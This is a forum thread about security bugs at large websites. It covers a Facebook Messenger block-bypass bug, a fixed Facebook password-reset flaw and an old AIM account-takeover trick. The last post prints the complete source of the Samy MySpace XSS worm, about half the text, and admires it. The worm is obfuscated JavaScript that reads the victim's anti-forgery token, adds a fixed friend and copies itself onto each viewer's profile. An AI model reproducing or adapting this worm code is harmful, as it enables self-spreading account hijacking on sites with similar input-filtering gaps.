Even giant companies have security flaws

[Ghost]

I have not recently tried to replicate the bug I am about to disclose, but I experienced a security flaw on a major website a few days ago. It's not the biggest bug, but also not the smallest either. I want to mention it here because it doesn't actually compromise any accounts or personal details, and I think it highlights an important aspect of the internet, apps, and devices: Even large multi-billion dollar companies can have security flaws, bugs, and problems.

I think it is too often that we criticize ourselves or other websites for problems that arise. Whether it's a design bug on a mobile version or a bug that prevents us from posting on a forum, many of us have been too quick to act like the webmaster/administrator is not doing their job. Perhaps we should focus more on the fact that the site exists in the first place, and the site is clearly so wonderful that we feel frustrated when something doesn't work. After all, I discovered a fairly large-ish bug on Facebook just the other day.

I was speaking with someone about selling some sound equipment and they did not agree with my asking price. The device is a few years old, but is in mint condition and was worth over $1,000 retail and goes for around $350 used now. I was asking for $200, but they only wanted to pay $100. I obviously did not agree to this, but they kept pushing and eventually blocked me on Facebook messenger. However, a bug occurred and I did not notice I was blocked.

I was able to continue messaging the potential buyer and I sent 3 messages trying to convince them why $200 was a more than fair asking price for the sound receiver. Suddenly they accused me of hacking because they had blocked me & threatened to call the police. It was absolutely absurd and I couldn't figure out what they were even talking about. I was able to send them messages & receive messages from them without an issue. Being the nerd I am though, I went on to my PC and opened up Facebook there. I kept my iPhone ready at my side. Sure enough, when I went to Facebook's messages page I was unable to reply to the potential buyer. They had in fact blocked me. I tried reloading the page and everything, to no avail. And yet when I picked my iPhone back up, I was able to still send messages because their chat box was still open and for some reason the app had not received the message that I was blocked. Now, this obviously opens up a lot of potential reasons for the security flaw... Why is Facebook's messaging software not checking for blocked users on the server side? This seemed to be a clear case where a web browser & mobile app could both send messages, but their code on the actual server was not ensuring there were no blocks in place before sending the message. I should have received an error when attempting to send a message... However, it seems that the mobile app itself is responsible for preventing me from sending messages if I'm blocked.

I explained this weird issue with the buyer and said goodbye. I then closed the mobile app, reopened it & reloaded my messages list and sure enough when I clicked their message I was now unable to send new messages. The app had finally received the alert from Facebook that I was blocked... but it did not occur originally because I had not closed the chat on my phone. It seems that the mobile app only receives new data about blocks if you close the app and/or go to your messages list, but if you have an active chat open it will continue to let you send messages even if you're blocked.

So, obviously this is a fairly big bug that could affect victims in harassment cases because the bug persisted for a while. There was over 45 minutes of time before I closed the app and refreshed. Simply put, the app was never going to prevent me from sending a message to the potential buyer as long as I kept his chat window open on my phone.

Perhaps this is a bit long-winded, but I just wanted to share my story here to remind you all that even large companies have issues with their websites, apps, and servers. I hope we can all keep this in mind before jumping the gun & criticizing an administrator who is working their butt off just because something goes wrong. 🙂

 

[Jordan]

I use to be able to reset people's Facebook passwords to what I wanted without actually knowing any of their information at all. (This has since been fixed)
There will always bee security flaws one way or another 😛

 

[Ghost]

I use to be able to reset people's Facebook passwords to what I wanted without actually knowing any of their information at all. (This has since been fixed)
There will always bee security flaws one way or another 😛

This reminds me of a security flaw with AOL/AIM.
There was an old foreign sign up page (if I remember correctly, it was their Russian registration page/site) that allowed you to take ownership of accounts.
Basically there were errors with their username-availability checker on the foreign sign up page, so you could register AIM accounts that were already taken. You could then use this new account to log in to the server with all of the account details changed including password reset options like email, the password itself, etc. The security flaw was spread around for over a year before it was patched up and it was a secret before word got out too. A small group of hackers used that method for a long time.

There were a lot of AIM/AOL exploits that allowed hackers to take control of accounts, suspend/ban them, and more for years.

Another example that comes to mind is all of the MySpace exploits. The most famous was the Samy worm (XSS vulnerability) that sent Samy a friend request from your account & wrote "but most of all, samy is my hero" on your profile. It spread like wildfire and affected countless profiles. As you can see, it was actually pretty well thought out - but obviously illegal. Here's how it was done.

Here is the end result code that Samy wrote. Any time a user encountered an affected profile, their profile was compromised right after... and so on and so on. Once it was released, there was absolutely nothing Samy could do to stop it. It used basic JavaScript with some unique methods to avoid MySpace breaking the code.

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>